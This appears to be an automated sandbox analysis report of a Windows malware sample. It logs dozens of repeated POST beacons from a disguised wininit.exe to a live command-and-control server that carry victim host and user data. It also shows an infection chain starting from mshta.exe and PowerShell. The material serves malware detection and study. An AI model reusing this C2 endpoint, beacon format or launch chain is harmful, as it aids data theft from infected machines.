                                                                                                                              Nov 20, 2024 10:58:45.036253929 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:45.774208069 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:45 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              100192.168.2.45883494.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:45.923891068 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:45.931401968 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:46.706713915 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:46 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              101192.168.2.45883594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:46.863411903 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:46.868272066 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:47.637343884 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:47 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              102192.168.2.45883694.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:47.796686888 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:47.801636934 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:48.567925930 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:48 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              103192.168.2.45883794.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:48.714452028 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:48.719400883 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:49.472841978 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:49 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              104192.168.2.45883894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:49.623297930 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:49.631589890 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:50.369251013 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:50 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              105192.168.2.45883994.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:50.526932001 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:50.531924009 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:51.270072937 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:51 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              106192.168.2.45884094.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:51.457564116 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:51.462507010 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:52.210387945 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:52 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              107192.168.2.45884194.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:52.358613968 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:52.365082979 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:53.245441914 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:53 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              108192.168.2.45884294.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:53.415009975 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:53.422435045 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:54.194730997 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:54 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              109192.168.2.45884394.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:54.354259968 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:54.359199047 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:55.228442907 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:55 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              110192.168.2.45884494.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:55.376452923 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:55.384692907 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:56.119107008 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:56 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              111192.168.2.45884594.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:56.451621056 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:56.456662893 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:57.203265905 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:57 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              112192.168.2.45884694.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:57.363667965 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:57.368693113 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:58.145519972 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:58 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              113192.168.2.45884794.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:58.294749975 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:58.299877882 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:58:59.067029953 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:58:58 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              114192.168.2.45884894.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:58:59.217894077 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:58:59.223139048 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:59:00.142062902 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:59:00 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              115192.168.2.45884994.156.177.41802668C:\Users\user\AppData\Roaming\wininit.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 20, 2024 10:59:00.307096004 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                                                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                                              Host: 94.156.177.41
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Content-Encoding: binary
                                                                                                                              Content-Key: 9D963662
                                                                                                                              Content-Length: 149
                                                                                                                              Connection: close
                                                                                                                              Nov 20, 2024 10:59:00.315009117 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 34 00 32 00 32 00 33 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                                              Data Ascii: (ckav.rujones142233JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                                                              Nov 20, 2024 10:59:01.195844889 CET193INHTTP/1.1 404 Not Found
                                                                                                                              Server: nginx/1.26.1
                                                                                                                              Date: Wed, 20 Nov 2024 09:59:01 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Connection: close
                                                                                                                              X-Powered-By: PHP/5.4.16
                                                                                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                                              Data Ascii: File not found.


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:04:56:58
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:mshta.exe "C:\Users\user\Desktop\goodtoseeuthatgreatthingswithentirethingsgreatfor.hta"
                                                                                                                              Imagebase:0xb10000
                                                                                                                              File size:13'312 bytes
                                                                                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:1
                                                                                                                              Start time:04:56:58
                                                                                                                              Start date:20/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):true
